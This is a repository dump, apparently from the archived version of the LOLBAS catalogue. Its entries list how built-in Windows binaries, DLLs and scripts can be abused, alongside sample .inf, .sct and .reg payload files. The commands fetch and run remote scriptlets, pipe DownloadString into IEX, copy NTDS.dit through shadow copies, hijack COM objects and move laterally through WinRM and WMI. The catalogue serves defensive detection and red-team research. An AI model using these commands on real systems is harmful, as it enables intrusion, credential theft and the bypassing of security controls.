wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.

wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Create a volume shadow copy of NTDS.dit that can be copied.

wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Execute a script contained in the target .XSL file hosted on a remote server.

wmic.exe os get /format:"MYXSLFILE.xsl"
Executes JScript or VBScript embedded in the target XSL stylesheet.

wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Executes JScript or VBScript embedded in the target remote XSL stylsheet.
```
   
* Resources:   
  * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
  * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
  * https://twitter.com/subTee/status/986234811944648707
   
* Full path:   
  * c:\windows\system32\wbem\wmic.exe
  * c:\windows\sysWOW64\wbem\wmic.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Wab.exe.md
================================================
## Wab.exe
* Functions: Execute
```

Wab.exe
Loads a DLL configured in the registry under HKLM.
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
  * https://twitter.com/Hexacorn/status/991447379864932352
   
* Full path:   
  * C:\Program Files\Windows Mail\wab.exe    
  * C:\Program Files (x86)\Windows Mail\wab.exe    
   
* Notes: Thanks to Adam - @Hexacorn
Requires registry changes, Requires Administrative Access  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Wscript.exe.md
================================================
## Wscript.exe
* Functions: Execute, Read ADS
```

wscript c:\ads\file.txt:script.vbs
Executes the .VBS script stored as an Alternate Data Stream (ADS).
```
   
* Resources:   
  * ?
   
* Full path:   
  * c:\windows\system32\wscript.exe
  * c:\windows\sysWOW64\wscript.exe
   
* Notes: Thanks to ?  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Xwizard.exe.md
================================================
## Xwizard.exe
* Functions: DLL hijack, Execute
```

xwizard.exe
Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
Xwizard.exe running a custom class that has been added to the registry.
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
  * https://www.youtube.com/watch?v=LwDHX7DVHWU
  * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
   
* Full path:   
  * c:\windows\system32\xwizard.exe
  * c:\windows\sysWOW32\xwizard.exe
   
* Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer  
   


================================================
FILE: Archive-Old-Version/OSBinaries/hh.exe.md
================================================
## hh.exe
* Functions: Download, Execute
```

HH.exe http://www.google.com
Opens google's web page with HTML Help.

HH.exe C:\
Opens c:\\ with HTML Help.

HH.exe c:\windows\system32\calc.exe
Opens calc.exe with HTML Help.

HH.exe http://some.url/script.ps1
Open the target PowerShell script with HTML Help.
```
   
* Resources:   
  * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
   
* Full path:   
  * c:\windows\system32\hh.exe
  * c:\windows\sysWOW64\hh.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/mshta.exe.md
================================================
## mshta.exe
* Functions: Execute, Read ADS
```

mshta.exe evilfile.hta
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Executes VBScript supplied as a command line argument.

mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Executes JavaScript supplied as a command line argument.

mshta.exe "C:\ads\file.txt:file.hta"
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
```
   
* Resources:   
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
   
* Full path:   
  * C:\Windows\System32\mshta.exe
  * C:\Windows\SysWOW64\mshta.exe
   
* Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/odbcconf.exe.md
================================================
## odbcconf.exe
* Functions: Execute
```

odbcconf -f file.rsp
Load DLL specified in target .RSP file.
```
   
* Resources:   
  * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
  * https://github.com/woanware/application-restriction-bypasses
  * https://twitter.com/subTee/status/789459826367606784
   
* Full path:   
  * c:\windows\system32\odbcconf.exe    
  * c:\windows\sysWOW64\odbcconf.exe
   
* Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
See the Playloads folder for an example .RSP file.
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/reg.exe.md
================================================
## reg.exe
* Functions: Export Reg, Add ADS, Import Reg
```

reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Export the target Registry key and save it to the specified .REG file.
```
   
* Resources:   
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
   
* Full path:   
  * c:\windows\system32\reg.exe
  * c:\windows\sysWOW64\reg.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/regedit.exe.md
================================================
## regedit.exe
* Functions: Write ADS, Read ADS, Import registry
```

regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Export the target Registry key to the specified .REG file.

regedit C:\ads\file.txt:regfile.reg"
Import the target .REG file into the Registry.
```
   
* Resources:   
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
   
* Full path:   
  * C:\Windows\System32\regedit.exe
  * C:\Windows\SysWOW64\regedit.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Advpack.dll.md
================================================
## Advpack.dll
* Functions: Execute
```

rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).

rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).

rundll32.exe Advpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.

rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Launch executable by calling the RegisterOCX function.

rundll32.exe Advpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```
   
* Resources:   
  * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  * https://twitter.com/ItsReallyNick/status/967859147977850880
  * https://twitter.com/bohops/status/974497123101179904
  * https://twitter.com/moriarty_meng/status/977848311603380224
   
* Full path:   
  * c:\windows\system32\advpack.dll
  * c:\windows\sysWOW64\advpack.dll
   
* Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
================================================
## Ieadvpack.dll
* Functions: Execute
```

rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).

rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).

rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.

rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/991695411902599168
  * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  * https://twitter.com/0rbz_/status/974472392012689408
   
* Full path:   
  * c:\windows\system32\ieadvpack.dll
  * c:\windows\sysWOW64\ieadvpack.dll
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Ieframe.dll.md
================================================
## Ieframe.dll
* Functions: Execute
```

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
Renamed URL file.
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
  * https://twitter.com/bohops/status/997690405092290561
   
* Full path:   
  * c:\windows\system32\Ieframe.dll
  * c:\windows\sysWOW64\Ieframe.dll
   
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Mshtml.dll.md
================================================
## Mshtml.dll
* Functions: Execute
```

rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/998567549670477824
   
* Full path:   
  * c:\windows\system32\Mshtml.dll
  * c:\windows\sysWOW64\Mshtml.dll
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Advpack.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee --> 
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
	}

]]>
</script>

</scriptlet>

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

================================================
FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee --> 
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
	}

]]>
</script>

</scriptlet>

================================================
FILE: Archive-Old-Version/OSLibraries/Pcwutl.dll.md
================================================
## Pcwutl.dll
* Functions: Execute
```

rundll32.exe pcwutl.dll,LaunchApplication calc.exe
Launch executable by calling the LaunchApplication function.
```
   
* Resources:   
  * https://twitter.com/harr0ey/status/989617817849876488
   
* Full path:   
  * c:\windows\system32\Pcwutl.dll
  * c:\windows\sysWOW64\Pcwutl.dll
   
* Notes: Thanks to Matt harr0ey - @harr0ey  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Setupapi.dll.md
================================================
## Setupapi.dll
* Functions: Execute
```

rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
Launch an executable file via the InstallHinfSection function and .inf file section directive.

rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/994742106852941825
  * https://twitter.com/subTee/status/951115319040356352
  * https://twitter.com/KyleHanslovan/status/911997635455852544
  * https://github.com/huntresslabs/evading-autoruns
   
* Full path:   
  * c:\windows\system32\Setupapi.dll
  * c:\windows\sysWOW64\Setupapi.dll
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Shdocvw.dll.md
================================================
## Shdocvw.dll
* Functions: Execute
```

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
Renamed URL file.
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
  * https://twitter.com/bohops/status/997690405092290561
   
* Full path:   
  * c:\windows\system32\Shdocvw.dll
  * c:\windows\sysWOW64\Shdocvw.dll
   
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Shell32.dll.md
================================================
## Shell32.dll
* Functions: Execute
```

rundll32.exe shell32.dll,Control_RunDLL payload.dll
Launch DLL payload.

rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Launch executable payload.

rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Launch executable payload with arguments.
```
   
* Resources:   
  * https://twitter.com/Hexacorn/status/885258886428725250
  * https://twitter.com/pabraeken/status/991768766898941953
  * https://twitter.com/mattifestation/status/776574940128485376
  * https://twitter.com/KyleHanslovan/status/905189665120149506
   
* Full path:   
  * c:\windows\system32\shell32.dll
  * c:\windows\sysWOW64\shell32.dll
   
* Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Syssetup.dll.md
================================================
## Syssetup.dll
* Functions: Execute
```

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.

rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/994392481927258113
  * https://twitter.com/harr0ey/status/975350238184697857
  * https://twitter.com/bohops/status/975549525938135040
   
* Full path:   
  * c:\windows\system32\Syssetup.dll
  * c:\windows\sysWOW64\Syssetup.dll
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Url.dll.md
================================================
## Url.dll
* Functions: Execute
```

rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
Launch a HTML application payload by calling OpenURL.

rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.

rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling OpenURL.

rundll32.exe url.dll,FileProtocolHandler calc.exe
Launch an executable payload by calling FileProtocolHandler.

rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Launch a HTML application payload by calling FileProtocolHandler.

rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling FileProtocolHandler.
```
   
* Resources:   
  * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
  * https://twitter.com/bohops/status/974043815655956481
  * https://twitter.com/DissectMalware/status/995348436353470465
  * https://twitter.com/yeyint_mth/status/997355558070927360
  * https://twitter.com/Hexacorn/status/974063407321223168
   
* Full path:   
  * c:\windows\system32\url.dll
  * c:\windows\sysWOW64\url.dll
   
* Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)  
   


================================================
FILE: Archive-Old-Version/OSLibraries/Zipfldr.dll.md
================================================
## Zipfldr.dll
* Functions: Execute
```

rundll32.exe zipfldr.dll,RouteTheCall calc.exe
Launch an executable payload by calling RouteTheCall.

rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling RouteTheCall.
```
   
* Resources:   
  * https://twitter.com/moriarty_meng/status/977848311603380224
  * https://twitter.com/bohops/status/997896811904929792
   
* Full path:   
  * c:\windows\system32\zipfldr.dll
  * c:\windows\sysWOW64\zipfldr.dll
   
* Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)  
   


================================================
FILE: Archive-Old-Version/OSScripts/CL_Invocation.ps1.md
================================================
## CL_Invocation.ps1
* Functions: Execute
```

. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
```
   
* Resources:   
  * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
  * https://twitter.com/bohops/status/948548812561436672
  * https://twitter.com/pabraeken/status/995107879345704961
   
* Full path:   
  * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
  * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
   
* Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)  
   


================================================
FILE: Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md
================================================
## CL_Mutexverifiers.ps1
* Functions: Execute
```

. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1   
runAfterCancelProcess calc.ps1
Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/995111125447577600
   
* Full path:   
  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)  
   


================================================
FILE: Archive-Old-Version/OSScripts/Manage-bde.wsf.md
================================================
## Manage-bde.wsf
* Functions: Execute
```

set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.

copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
```
   
* Resources:   
  * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
  * https://twitter.com/bohops/status/980659399495741441
   
* Full path:   
  * C:\Windows\System32\manage-bde.wsf
   
* Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)  
   


================================================
FILE: Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	
	
]]>
</script>

</scriptlet>

================================================
FILE: Archive-Old-Version/OSScripts/Payload/Slmgr.reg
================================================
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""

[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"


[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"

================================================
FILE: Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct
================================================
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Scripting.Dictionary"
    progid="Scripting.Dictionary"
    version="1"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[

		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	
	
]]>
</script>

</scriptlet>

================================================
FILE: Archive-Old-Version/OSScripts/Pubprn.vbs.md
================================================
## Pubprn.vbs
* Functions: Execute
```

pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
```
   
* Resources:   
  * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://github.com/enigma0x3/windows-operating-system-archaeology
   
* Full path:   
  * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
  * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
   
* Notes: Thanks to Matt Nelson - @enigma0x3  
   


================================================
FILE: Archive-Old-Version/OSScripts/Slmgr.vbs.md
================================================
## Slmgr.vbs
* Functions: Execute
```

reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
```
   
* Resources:   
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://www.youtube.com/watch?v=3gz1QmiMhss
   
* Full path:   
  * c:\windows\system32\slmgr.vbs
  * c:\windows\sysWOW64\slmgr.vbs
   
* Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee  
   


================================================
FILE: Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md
================================================
## SyncAppvPublishingServer.vbs
* Functions: Execute
```

SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Inject PowerShell script code with the provided arguments
```
   
* Resources:   
  * https://twitter.com/monoxgas/status/895045566090010624
  * https://twitter.com/subTee/status/855738126882316288
   
* Full path:   
  * C:\Windows\System32\SyncAppvPublishingServer.vbs
   
* Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee  
   


================================================
FILE: Archive-Old-Version/OSScripts/Winrm.vbs.md
================================================
## Winrm.vbs
* Functions: Execute
```

reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.

winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.

winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
```
   
* Resources:   
  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
  * https://www.youtube.com/watch?v=3gz1QmiMhss
  * https://github.com/enigma0x3/windows-operating-system-archaeology
  * https://redcanary.com/blog/lateral-movement-winrm-wmi/
  * https://twitter.com/bohops/status/994405551751815170
   
* Full path:   
  * C:\windows\system32\winrm.vbs
  * C:\windows\SysWOW64\winrm.vbs
   
* Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)  
   


================================================
FILE: Archive-Old-Version/OSScripts/pester.bat.md
================================================
## pester.bat
* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
```

Pester.bat [/help|?|-?|/?] "$null; notepad"
Execute notepad
```
   
* Resources:   
  * https://twitter.com/Oddvarmoe/status/993383596244258816
  * https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
   
* Full path:   
  * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
  * c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
   
* Notes: Thanks to Emin Atac - @p0w3rsh3ll  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/AcroRd32.exe.md
================================================
## AcroRd32.exe
* Functions: Execute
```

Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/997997818362155008
   
* Full path:   
  * C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Gpup.exe.md
================================================
## Gpup.exe
* Functions: Execute
```

Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Execute another command through gpup.exe (Notepad++ binary).
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/997892519827558400
   
* Full path:   
  * C:\Program Files (x86)\Notepad++\updater\gpup.exe    
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Nlnotes.exe.md
================================================
## Nlnotes.exe
* Functions: Execute
```

